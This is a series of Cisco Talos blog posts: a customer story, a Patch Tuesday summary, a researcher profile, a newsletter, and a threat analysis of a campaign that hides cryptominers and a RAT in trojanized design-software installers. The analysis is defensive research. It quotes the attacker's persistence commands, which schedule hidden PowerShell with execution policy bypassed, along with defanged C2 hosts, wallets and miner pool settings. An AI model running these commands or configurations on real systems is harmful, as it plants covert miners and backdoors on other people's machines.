“Cisco knows our structure, they know our IR plans, they know our privilege and information sharing practices, they know our regulatory obligations,” he said after the incident was resolved. “As a result of this unique relationship, we save precious minutes and hours in response time not having to bring them up to speed each time. They are already ready to go with our team side by side, step by step.”

Veradigm takes preparation seriously, not trying to formulate a plan during an active incident, but actively reviewing their IR plan and playbooks regularly. The company has also participated in multiple Talos IR tabletop exercises to stress test its processes and adjust as needed to respond and succeed more quickly.

“Preparation is crucial. During your IR, you cannot formulate a plan on how to respond and react,” Maxwell said. “When something does occur, we do what we planned, we have enabled ourselves to succeed with the IR plan in action. It’s not just theory — it’s practice.”

How Cisco Talos IR helped a healthcare company quickly resolve a Qakbot attack

In this episode of the Cisco Security Stories podcast, Jeremy Maxwell talks through the incident step by step, and how Veradigm has benefitted from a close relationship with Talos Incident Response over many years.

An additional benefit Veradigm has from the retainer is the sharing of knowledge and experiences to not only apply during an incident but leveraging to boost the expertise of their in-house IR team.

“Another bonus is that due to the size of Cisco, their team is not only our ally, but also a fountain of information with their global network of responses and knowledge across the spectrum. We can leverage that experience and skillset to our advantage,” Maxwell said. “Cisco also brings professional backing and confidence to further expand our team of expertise and process.”

Are you looking to build or further enhance your incident response readiness program? We can help with the Cisco Talos Incident Response Retainer service. Connect with us to learn more:

Microsoft Patch Tuesday for September 2023 — Unusually low 5 critical vulnerabilities included in Microsoft Patch Tuesday, along with two zero-days

12 September 2023 at 20:51
Microsoft Patch Tuesday for September 2023 — Unusually low 5 critical vulnerabilities included in Microsoft Patch Tuesday, along with two zero-days

Microsoft disclosed 65 vulnerabilities across its suite of products and software Tuesday, only five of which are considered critical, which is very low compared to Microsoft’s usual security updates.

However, there are two issues disclosed and patched this month that have already been exploited in the wild.

Fifty-six of the vulnerabilities included in this month’s Patch Tuesday are considered “important,” according to Microsoft, while two are of “moderate” severity. One remote code execution vulnerability in Microsoft Exchange Server, CVE-2023-36756, was meant to be included in August’s security update but was mistakenly excluded. Users should ensure the August 2023 security update for Exchange is already downloaded to remediate this issue.

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges.

Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how, exactly, an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes.

Another Word vulnerability included in Tuesday’s security update is CVE-2023-36762, which could lead to arbitrary code execution. An adversary could exploit this issue by tricking a user into opening a specially crafted Word document. It’s common for attackers to use this method and try to trick users into opening the document as an email attachment.

There are also four remote code execution vulnerabilities in Microsoft Visual Studio — CVE-2023-36794, CVE-2023-36796, CVE-2023-36792 and CVE-2023-36793 — that could be triggered if a user opens a specially crafted, weaponized file. This type of attack is particularly notable, as Google’s Threat Analysis Group reported that the high-profile Lazarus Group APT is using this method to target security developers and researchers on social media.

Lastly, we also believe CVE-2023-36745, CVE-2023-36756 and CVE-2023-36744 are worth highlighting. These are remote code execution vulnerabilities in Microsoft Exchange Server, which attackers are known to target as part of a variety of attacks.

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 57193, 62385-62388, 62394-62396, 62401, 300687-300688.

You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)

11 September 2023 at 12:00

How her work illustrates the difference Talos’ vulnerability research team makes

You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)

When Kelly Patterson first learned how to code by making small programs in her high school class, she preferred breaking her creations to building them.

She’d make a game and then spend double the time debugging that same code, looking for holes in her work.

Today, she’s always looking for what’s wrong with other people’s code, whether that be in a wireless router, IoT speaker, or an open-source software stack that dates back to 1991.

Patterson is one of the researchers that make up Talos’ Vulnerability Discovery team, a group of reverse-engineers, penetration testers and general expert coders who look for vulnerabilities in firmware, software and hardware and help the creators fix those issues.

Patterson and her teammates are responsible for helping to disclose and patch more than 200 security vulnerabilities a year, some of which affect devices used in thousands of households around the world, and others that support everything from industrial control systems to critical infrastructure.

Specifically for Patterson, she enjoys looking at hardware and its accompanying firmware. She began her IT career as a systems engineer but quickly found that she was more interested in debugging what she was working on, so she started pursuing projects outside of the office that allowed her to reverse-engineer code and talk about it publicly. This eventually led her to Talos, which was specifically attractive because it allowed her to be a researcher full-time.

“I like to spread the word that these bugs are still out there and we’re finding them, proving that we haven’t ‘solved’ security completely,” Patterson said.

One of her first and most memorable projects at Talos was looking at a series of programmable logic controllers (PLCs) made by WAGO, a German company specializing in automation solutions. She teamed up with other researchers to approach these devices from different angles, trying to dissect what attack surface existed, exactly. By the time their research was public, they had found several critical vulnerabilities in two WAGO PLCs that could allow a remote, unauthenticated attacker to execute arbitrary code on the devices or cause a denial of service by sending specially crafted packets.

You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)
Patterson performing with her improv troupe.

Patterson specifically focused on the cloud-connected portion of the software, which opened her eyes to the attack surface that cloud storage and communication presents.

“That was fun research for me. It helped open my eyes to the fact that the cloud is an attack vector for embedded devices,” she said. “Myself, Carl [Hurd] and Patrick [DeSantis] split it up and came at it from different angles — it was a great device to research because it was so customizable and had a huge attack surface.”

That research led her to look at more industrial control systems and internet-of-things devices that are virtually always on and talking to the network. Right now she’s examining various open-source software stacks that ICS environments typically use and has multiple fuzzers running to search for potential code vulnerabilities.

As Patterson puts it, not all code bugs are vulnerabilities, but all vulnerabilities are bugs — it’s up to her to determine if a bug could allow a bad actor to carry out any undesirable action. Once she confirms a vulnerability exists, her team reports it to the vendor (all adhering to Cisco’s third-party vulnerability disclosure policy) and works with them to create a patch. Then, she also has to confirm that that patch works and fixes the issue, which isn’t always the case.

“I think a lot of times vendors patch the bugs we find, but I think it provides a way for other developers to look into what kind of bugs they’re hiding and accidentally actually designing and creating into their products. Hopefully, this information helps them so other vendors’ bugs don’t end up in the wild,” she said.

When she starts any research into a particular product, her endgame is usually to gain access to the firmware. Many times, vendors will do everything they can to hide the firmware, so she’ll develop a method to intercept a firmware update or look for ways she can physically access the device’s inner workings to exploit any vulnerabilities that exist there.

“I try to think of things that I know are commonly used and would have a large impact if they were compromised. In the past, that’s been a lot of ICS,” Patterson said. “Or maybe it’s a new architecture or framework that I haven’t worked with before.”

All this research has made Patterson slightly more paranoid than the average user — she always opts for the “dumb” version of any appliance or electronic she brings into her home to limit the number of devices connected to her home network. But she doesn’t balk at using certain IoT devices like home assistants or smart speakers, either, because she trusts certain manufacturers’ internal testing teams who look for vulnerabilities before a product is released.

Though she’s now four-plus years into her career as a vulnerability researcher, Patterson was not always sure she was going to stay on this path.

During the COVID-19 pandemic, she elected to leave her role at Talos to be a stay-at-home mom while her children couldn’t attend school in person.

“I was scared — it was a really tough time,” Patterson said. “And I hadn’t ever been solely responsible for caring for my children all the time. But it ended up being a really good experience.”

Patterson spent about 21 months away from work, during which she questioned whether she wanted to keep at her vulnerability research or look down another IT-related career path. After taking on some personal projects and home and mulling it over, she decided to re-apply for an opening at Talos and re-joined the vulnerability research team in September 2022 part-time.

She currently works a half-time schedule to balance her duties as a mom and her work.

“That was a lot of personal growth for me to figure out a work-life balance, which I never was forced to do before until [crap] hit the fan,” Patterson said.

You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)
Patterson has several interests outside of work, including rock climbing.

Patterson said her current goals are built around writing and creating new tools she can use to examine firmware and software, she says she often learns more from the process of building those tools than examining the vulnerabilities themselves.

And while she does enjoy breaking apart routers every now and then, she said she views her work creating fuzzers and other tools for examining code as part of the larger vulnerability puzzles her team works on.

"That’s the major benefit of working on a team is that we all have our own specialties,” she said.  “It can feel challenging because you can feel like you get stuck, but that’s where other people come in to make suggestions or push you over the hump.”

A secondhand account of the worst possible timing for a scammer to strike

7 September 2023 at 18:00
A secondhand account of the worst possible timing for a scammer to strike

Welcome to this week’s edition of the Threat Source newsletter.

Up until last week, I had never considered the timing of a scam to be important. I’m so used to just swiping away emails or text messages at random times during the day that I’d never considered what would happen if an adversary happened to get me at just the right time.

That’s what happened to my wife last week.

We were on vacation, and I was away for a few hours at lunch with my friends while she and the other spouses stayed back with our children to hang out at the pool for a bit.

She received a text message from an unknown number asking her to confirm a Zelle payment to someone she had never heard of for a not-insignificant amount of money. Not even a minute later, she received a call from the same number from someone claiming to represent our bank asking if the transaction was fraudulent and if could she provide some personal information to verify the transaction or cancel it.

In most cases, she probably would have put them on hold and Googled the number to see if it was legitimate or logged into her online account to view her recent transactions. The problem was this scammer had hit her at the worst possible time. It was right in the middle of a diaper change for our 10-month-old daughter, and she was trying to change our daughter out of a wet bathing suit and stop her from crying because they were just a few minutes away from naptime.

Already in a panic (and not to mention exhausted from the heat at the beach), she answered the phone call and listened to the person on the other line, growing increasingly frustrated and just wanting to end the phone call as quickly as possible so she could return her attention to our daughter while trying to make sure we weren’t legitimately about to be scammed out of money.

Our friends thankfully intervened after she put the phone on speaker, and they all noticed some similar red flags and she ended the conversation before giving away any significant information the scammer didn’t already seem to have.

But it did get me thinking about how the timing and urgency of these scams can make such a difference. I can’t say the same thing wouldn’t have happened to me had I been in the middle of a diaper change and having to worry about something as stressful as money. Or what if they had caught my wife while she was in the car and didn’t have the internet or friends at her disposal?

This timing was purely blind luck on the attacker’s part, but it nonetheless almost worked out for them. I’m not trying to throw my wife under the bus or anything, I just wanted to use this story to illustrate that anyone can be a target of these types of scams at any time, and the scammers don’t care if you have to change a dirty diaper or not.

The one big thing

Cybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines, new Cisco Talos research shows. The campaign, active since late last year, appears to primarily target graphic designers or any other engineers who may rely on 3-D modeling software who speak French. Cybercriminals are likely targeting these users because this type of software requires large GPUs, which also happen to be extremely useful when mining cryptocurrency.

Why do I care?

This campaign specifically targets business verticals such as architecture, engineering, construction, manufacturing and entertainment, though anyone using a computer of any type could be a target of a cryptocurrency mining malware. The attackers’ use of Advanced Installer also allows the backdoors used in this campaign to often slip by undetected.

So now what?

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. And if you’re ever curious about what your GPU is up to, use Task Manager on Windows or Activity Monitor on Mac to check out what your machine’s computing power is going toward. There are also specific Cisco Secure protections available that we outlined in Talos’ blog on this campaign.

Top security headlines of the week

With students around the globe going back to school over the past few weeks, cyber attacks against the education sector are back in the spotlight. This time of year is often a popular time for attackers to strike against schools, colleges and universities because their systems are under the most stress at the start of a new school year. Private security companies in the U.K. issued public warnings to school leaders that their systems are likely not prepared for a sophisticated threat actor, days after a school in northern London had to delay its start date by six days due to a cyber attack. More than 100,000 people may have also had their personal information stolen as the result of a data breach against Minneapolis’ school district, with the Medusa ransomware group claiming it was behind the attack. Although the intrusion took place in February, the district last week sent home letters to students and parents describing the results of an investigation into the breach. (The Record by Recorded Future, Yahoo! News, BBC)

The FBI announced last week that it successfully dismantled the infamous Qakbot botnet. Known as “Operation: Duck Hunt,” the takedown involved the FBI deploying an in-house uninstaller tool to Qakbot-infected devices. International law enforcement also seized Qakbot infrastructure located in the U.S. and across Europe. In the announcement of the takedown, U.S. officials blamed Qakbot for more than 40 ransomware attacks over the past 18 months, generating $58 million in ransom payments. Authorities also seized millions of dollars’ worth of cryptocurrency from Qakbot, which they are working to return to the original owners. However, security researchers are warning that the operation likely won’t be gone forever, as the operators and creators of Qakbot apparently still remain at large, and these types of botnets typically find ways to be reborn after takedowns. (BankInfoSecurity, TechCrunch)

Researchers and reporters at “Wired” have unmasked one of the leaders of the Trickbot threat actor. A 41-year-old is allegedly behind the online monikers “Bentley” and “Manuel” who are known as being the creators of Trickbot. The investigation also uncovered potential connections between Trickbot and the Russian government and other cybercriminal games. Thousands of messages in a Trickbot group message were leaked last year, which included sensitive information researchers have been able to use to unmask some of the group’s operations. A single CEO-like figure also appears to be at the helm of Trickbot and the Conti ransomware gang, receiving daily updates on the groups’ operations, the messages show. (Wired, NISOS)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827
MD5: bf357485cf123a72a46cc896a5c4b62d
Typical Filename: bf357485cf123a72a46cc896a5c4b62d.virus
Claimed Product: N/A
Detection Name: W32.Auto:d5219579ee.in03.Talos

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab
MD5: 4c648967aeac81b18b53a3cb357120f4
Typical Filename: iptjqbjtb.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa
MD5: 9403425a34e0c78a919681a09e5c16da
Typical Filename: vincpsarzh.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::tpd

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

Cybercriminals target graphic designers with GPU miners

7 September 2023 at 12:00
  • Cybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines. This activity has been ongoing since at least November 2021.
  • The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max and SketchUp Pro, with malicious scripts and uses Advanced Installer's Custom Actions feature to make the software installers execute the malicious scripts.
  • The software installers targeted in this campaign are specifically used for 3-D modeling and graphic design, and most of them use the French language, indicating that the victims are likely across business verticals, including architecture, engineering, construction, manufacturing, and entertainment in French language-dominant countries.
  • The payloads include the M3_Mini_Rat client stub — which allows the attacker to establish a backdoor and download and execute additional threats, the Ethereum cryptocurrency-mining malware PhoenixMiner, and lolMiner, a multi-coin mining threat.
  • Cybercriminals are likely exploiting these particular software installers because of their need for high Graphics Processing Unit (GPU) power to function, which adversaries rely on to mine cryptocurrency.

Victimology

Cybercriminals target graphic designers with GPU miners

The attacks predominantly target users in France and Switzerland, with a few infections in other geographic areas, including the U.S., Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore and Vietnam, according to our analysis of the DNS request data sent to the attacker’s command and control (C2) host. Most of the software installers used in this campaign are written in French, supporting our observation that this campaign primarily targets French-speaking users.

Cybercriminals target graphic designers with GPU miners

The campaign likely affects business verticals such as architecture, engineering, construction, manufacturing and entertainment, as the attackers use software installers specifically created for 3-D modeling and graphic design. These industries are likely attractive targets for illicit cryptomining as they use computers with high GPU specifications and powerful graphics cards useful for generating cryptocurrency.

Cybercriminals target graphic designers with GPU miners

Cybercriminals target graphic designers with GPU miners

Cybercriminals target graphic designers with GPU miners

Cybercriminals target graphic designers with GPU miners

Cybercriminals target graphic designers with GPU miners

Cybercriminals target graphic designers with GPU miners

Campaign overview: Cybercriminals abuse Advanced Installer to execute cryptominers

Talos discovered an ongoing illicit cryptocurrency mining campaign that deploys malicious payloads by abusing the tool Advanced Installer. This is a legitimate tool designed to create software packages for Windows. However, the attackers used it to package legitimate software installers with malicious PowerShell and Windows batch scripts. These malicious scripts are executed using Advanced Installer’s Custom Action feature, which allows users to predefine custom installation tasks. The final payloads are PhoenixMiner and lolMiner, publicly available miners relying on computers’ GPU capabilities.

Cybercriminals target graphic designers with GPU miners
An example of a software installer packaged with malicious scripts using Advanced Installer.

In the same time frame, we also observed that the attacker deployed the M3_Mini_Rat client stub using tactics, techniques and procedures (TTPs) that are highly similar to the mining activity. A stub is a piece of code that translates parameters sent between the client and server during a remote procedure. The M3_Mini_Rat client stub is a PowerShell script generated by the M3_Mini_Rat and establishes a backdoor to the victim's machine. We could not determine if this backdoor was leveraged for cryptomining, however, we assessed the activity as likely part of the same mining campaign that deployed PhoenixMiner and lolMiner. In both instances, the attacker abused Advanced Installer and its Custom Actions feature to deploy malicious scripts, and the attack sequences and naming conventions are highly similar, as detailed in the methodology section below.

Attacker’s infrastructure

Analysis of the infrastructure used in this campaign revealed location data for the attacker-controlled C2 servers and other malware deployed from these servers in previous campaigns. The C2 server had the domain sysnod[.]duckdns[.]org, which resolved to an IP 104[.]244[.]76[.]183 in Luxembourg. Based on passive DNS resolution data, we discovered the domain sysnod[.]duckdns[.]org had previously resolved to the IPs 79[.]134[.]225[.]70 and 79[.]134[.]225[.]124 in Germany. In different malicious campaigns, these servers were operated as C2 servers for various RATs, including Nanocore, njRAT and AsyncRAT, suggesting that they were likely used by the same attacker in their previous campaigns. In another iteration of this mining campaign, the attacker had a malicious download server with the IP address 51[.]178[.]39[.]184 in France, which staged the intermediate PowerShell loaders, the encrypted PowerShell launcher scripts, PhoenixMiner and lolMiner.  

The attacker has used multiple wallet addresses since the campaign began in 2021 to facilitate mining different cryptocurrencies. In this campaign, we observed the attacker using the wallet addresses “0xbEB015945E9Da17dD0dc9A4b316f8F3150d93352” and “0xbCa8d14Df89cc74B158158E55FCaF5022a103795” for Ethereum Classic (ETC) and for FLUX (ZelHash) they used “t1KHZ5Piuo4Ke7i6BXfU4” and “t1KHZ5Piuo4Ke7i6BXfU4A.” Talos’ analysis of ETC transactions in the blockchain revealed that the attacker had made cryptocurrency transfers to several other wallets from those parent wallets. Based on this data, we compiled a timeline of the attacker’s mining activity and the number of ETCs mined since November 2021.

After only mining a few Ethereum in November and December 2021, their activity took off in October 2022. In January 2023, the adversaries generated more than 50 Ethereum Classic,  and on July 9, 2023, alone mined more than 50 (the equivalent of about $800 USD based on current values).

Two methodologies used to establish a backdoor or implant cryptominers

Talso discovered two multi-stage attack methodologies the attacker employed in this campaign. The first methodology shows how the M3_Mini_Rat client stub was installed and used to establish a backdoor to the victim’s machine. The second outlines how PhoenixMiner and lolMiner were implanted for cryptomining. We could not determine how the trojanized software installers were initially delivered to the victims’ machines. In the past, we have commonly seen such trojanized installers delivered using the search engine optimization (SEO) poisoning technique.

Attack method 1: Installing M3_Mini_Rat client stub

Cybercriminals target graphic designers with GPU miners
Summary of the first attack method.

The attack sequence is initiated when a victim clicks on a legitimate software installer, which the attacker bundled with a malicious script using Advanced Installer. The installer then drops a malicious batch script named “core.bat” and the legitimate PE executable “viewer.exe,” an Advanced Installer component as “MSI72E2.tmp” in the local user profile application data temporary folder. To execute the malicious script, the attackers abused Advanced Installer’s Custom Action feature by including command-line arguments to execute the dropped malicious batch file.

During the installation process, msiexec.exe, an executable program of the Windows Installer used to interpret installation packages and install products on target systems, runs  “MSI72E2.tmp (viewer.exe)” with the configured command-line arguments, which executes the malicious batch script. The example identified while analyzing the sample in our sandbox is shown below:

msiexec.exe C:\Windows\Installer\MSI72E2.tmp /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow “C:\Users\user\AppData\Local\Temp\core.bat”

Then, the software installer creates a folder called “webgard” in the local user profile roaming folder, and drops a malicious PowerShell loader script named “cor.ps1” (PS-1) and an encrypted file named “core.bin” which is the M3_Mini_RAT client stub.

The malicious batch script “core.bat”, which was dropped during the initial execution stage of the software installer, contains a command to configure the task scheduler in the victim’s machine. It creates a task named “ViGEmBusUpdater” that runs every minute to execute the malicious PowerShell loader script in the “webgard” folder. The attacker may have chosen the name “ViGEmBusUpdater” to evade detection by masquerading as the legitimate “ViGEmBusUpdater” executable. The task scheduler command is shown below:

schtasks /create /NP /sc minute /mo 1 /tn "ViGEmBusUpdater" /tr " 'powershell' -ExecutionPolicy ByPass -WindowStyle Hidden %appdata%\Webgard\cor.ps1" /f

The "ViGEmBusUpdater" task executes the malicious PowerShell loader script and decrypts the encrypted file “core.bin” to generate the M3_Mini_Rat client stub and run it in the victim’s machine memory. The M3_Mini_Rat client stub attempts to connect to the C2, however, during our analysis, the C2 was unresponsive, so we were unable to observe any subsequent payloads deployed, particularly cryptominers.

Cybercriminals target graphic designers with GPU miners
Screen capture of the PowerShell loader (PS-1).

Attack method 2: Installing PhoenixMiner and lolMiner

Cybercriminals target graphic designers with GPU miners
Summary of the second attack method.

In the second method, the attacker also abuses Advanced Installer and its Custom Actions feature to drop malicious batch scripts. As in method one, user interaction is required to run the software installer that has been bundled using Advanced Installer, which drops “viewer.exe” as a temporary file with a random filename and “core.bat” in the local user profile application data temporary folder. The second method is slightly different, as the installer is also bundled with a second batch script called “win.bat” that is dropped and saved alongside the other files. Then, “viewer.exe” executes the two dropped batch files based on the Custom Action commands, as previously outlined.

Another similarity between the two methods is that the software installer creates a folder, in this instance called “Winsoft,” in the local user roaming profile and drops a malicious PowerShell loader script “core.ps1” (PS-1) and an encrypted file “core.bin” (ENC-1).

The malicious batch script “win.bat” configures the task scheduler by creating a task “MSI Task Host - Detect_Monitor” to run every two hours to execute the malicious PowerShell loader script “core.ps1” (PS-1)  from the location “%appdata%\winsoft.” The task scheduler commands executed by “win.bat” are shown below.

Win.bat 

schtasks /create /NP /sc minute /mo 120 /tn "MSI Task Host - Detect_Monitor" /tr " 'powershell' -ExecutionPolicy ByPass -WindowStyle Hidden %appdata%\Winsoft\core.ps1" /RL HIGHEST /f

When the scheduled task “MSI Task Host - Detect_Monitor” is run, the PowerShell loader script (PS-1) is executed, which decrypts the encrypted file “core.bin” (ENC-1), generating and executing a PowerShell downloader script.

Cybercriminals target graphic designers with GPU miners
Screen capture of the dropped PowerShell loader (PS-1).

The PowerShell downloader downloads a malicious ZIP archive from an attacker-controlled server to the %windir% location on the victim’s machine. It unzips its contents to drop another PowerShell loader script “core.ps1” (PS-2), an encrypted file (ENC-2), and an Ethash miner called PhoenixMiner executable with “svhost.exe” as the filename.

Cybercriminals target graphic designers with GPU miners
A snippet of the PowerShell downloader which runs in the victim’s machine memory.‌ ‌

The malicious batch script, “core.bat,” has the command to create the task “ViGEmBusUpdater” and configures it to run every minute to execute the downloaded PowerShell loader script (PS-2) from the location %windir%. The task scheduler commands executed by core.bat are shown below.

core.bat

schtasks /create /ru SYSTEM /sc minute /mo 1 /tn "ViGEmBusUpdater1" /tr " 'powershell' -ExecutionPolicy Bypass %windir%\core.ps1" /f 

The downloaded PowerShell loader script (PS-2) is executed from the %windir% location when the scheduled task “ViGEmBusUpdater” runs which will decrypt the dropped encrypted file (ENC-2) to generate and execute a PowerShell launcher script in the victim’s system memory.

Cybercriminals target graphic designers with GPU miners
Screen capture of the downloaded PowerShell loader (PS-2).

The PowerShell launcher runs PhoenixMiner from the victim machine’s Windows systems folder with the Ethereum Classic mining parameters. The attacker uses the filename “svhost.exe,” which closely matches the legitimate Windows executable filename “svchost.exe” in the Windows systems folder, possibly trying to go unnoticed or undetected by the malicious process-scanning engines of endpoint security products.

Cybercriminals target graphic designers with GPU miners
Screen capture of the PowerShell launcher that executes in memory to run PhoenixMiner.

In our analysis of another trojanized software installer sample, the attack chain remains the same as the second attack method except for the payload, which is the lolMiner. The attacker gave lolMiner the file name “svshost.exe,” possibly to masquerade as “svchost.exe,”  dropped it in the location %windir%, and ran it using the PowerShell launcher script for FLUX (ZelHash) mining.

Cybercriminals target graphic designers with GPU miners

Payloads

The payloads delivered in this campaign are an M3_Mini_Rat client, an Ethash miner called PhoenixMiner, or lolMiner.

M3_Mini_Rat Client to establish a backdoor

M3_Mini_Rat client is a PowerShell script with remote administration capabilities that mainly focuses on performing system reconnaissance and downloading and executing other malicious binaries. The RAT client is built with a builder associated with the administration panel for M3_Mini_Rat, a .Net application whose author is called “Mr3.” Version 0.1 is currently the only one in the wild. The RAT uses its administration panel to perform remote administration activities on the victim’s machine via the RAT client after successfully implanting the RAT client stub. From the administration panel, the RAT can perform several remote administration functionalities, including File System activities, capturing screenshots, executing arbitrary commands, and sending files to the victim’s machine by loading them into the victim’s system memory or dropping them in the filesystem.

Cybercriminals target graphic designers with GPU miners
An example of the M3_Mini_Rat administration console.

When executed in the victim’s system memory, the RAT client stub connects to the command and control server by establishing a TCP connection on port 3434. Once successfully connected, an attacker can perform remote administration tasks shown in the M3_Mini_Rat administration panel and send commands for the RAT client to serve.

Cybercriminals target graphic designers with GPU miners
A sample code snippet of M3_Mini_Rat client stub showing C2 connection instructions.

The RAT client can execute the following commands:

Commands

Function

pc

Performs the reconnaissance and collects the data, including username, desktop name, operating system version, anti-virus, .Net status, CPU and GPU.

cl

Exit the RAT client.

dis

Disposes the data in the TCP stream and closes the connection

opr

Lists all of the running processes and collects the process IDs.

prc

Lists all running processes and collects the process IDs and executable path.

kpr

Stops the specific process with the target process ID as directed by the C2.

sh

Checks if the Citrix connection center server is running by checking if the main window title of the running process is “concentr.exe.”

frm

Sends the data to the C2 server.

drv

Enumerates the filesystem object and lists the logical drive names in the victim’s machine, and sends the recon data to the C2.

fld

Gets the details of the target folder specified by the C2.

dwn

Downloads the data as base64 encoded strings, decodes them and writes them to the variable defined in the RAT client script. Then the RAT client will send the decoded data back to the C2.

runas

Runs the malicious executable that is sent by C2.

up

Downloads the base64 encoded binary/data into a path specified by the attacker on the victim’s machine. 

uns

Exit the RAT client instance.

up1

Downloads the base64 encoded binary by decoding and writing it to a specified filename as directed by the C2 in the %AppData%\local\Temp folder and starts the dropped binary.

img

Checks if the payload is dropped properly by reading the contents of the dropped file and converting them into base64 encoded data stream, and uploading it to the C2 stream.

mf

Renames the downloaded file with the filenames as directed by the C2.

df

Deletes the dropped file.

cvs

Write the data to the C2 TCP stream.

PhoenixMiner to mine ETC

PhoenixMiner is an Ethash (ETH, ETC, Musicoin, EXP, UBQ, etc.) miner that supports AMD and Nvidia cards and works on the Ethash cryptocurrency algorithm. When executed, it utilizes the victim’s computer GPU power to mine Ethash. It is publicly available to download through the URL hxxps[://]phoenixminer[.]org.

In this campaign, the attacker uses the cryptocurrency mining pool parameters for the PhoenixMiner, as shown below:

Pool parameters

value

Description

pool

eu1-etc[.]ethermine[.]org[:]4444

Ethash Pool address

pool2

ssl[://]eu1-etc[.]ethermine[.]org[:]5555

Failover ethash pool address

wal

0xbEB015945E9Da17dD0dc9A4b316f8F3150d93352

0xbCa8d14Df89cc74B158158E55FCaF5022a103795

Crypto wallet address

worker

Rig0 and RigY

Worker name

pass

x

Ethash wallet password

proto

3

qtminer as the stratum protocol for the ethash pool

log

0

No logs to be written

powlim

75

GPU power limit to 75%

fanmax

65

System fan control maximum speed to 65%

coin

etc

Ethereum Classic

lolMiner to mine Flux

lolMiner is a cryptocurrency miner that uses the GPU capabilities of the computers to mine a variety of cryptocurrencies. It supports AMD, Nvidia and Intel cards. The LolMiner identified in this campaign is version 1.76, publicly available on GitHub. It can also mine two different cryptocurrencies at the same time.

Cybercriminals target graphic designers with GPU miners

The attacker in this campaign uses lolMiner to mine the FLUX (ZelHash) using the mining parameters shown below:

Pool parameters

value

Description

algo

FLUX

Algorithm to mine

pool

educu[.]xyz[:]9999

Mining pool to mine

user

t1KHZ5Piuo4Ke7i6BXfU4

t1KHZ5Piuo4Ke7i6BXfU4A

Wallet or pool user account to mine

pl

75

The Power limit values for GPUs

tstop

70

Temperature to pause or stop a GPU from mining

tstart

65

Minimal temperature for a GPU to start mining.

Coverage

Cybercriminals target graphic designers with GPU miners


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

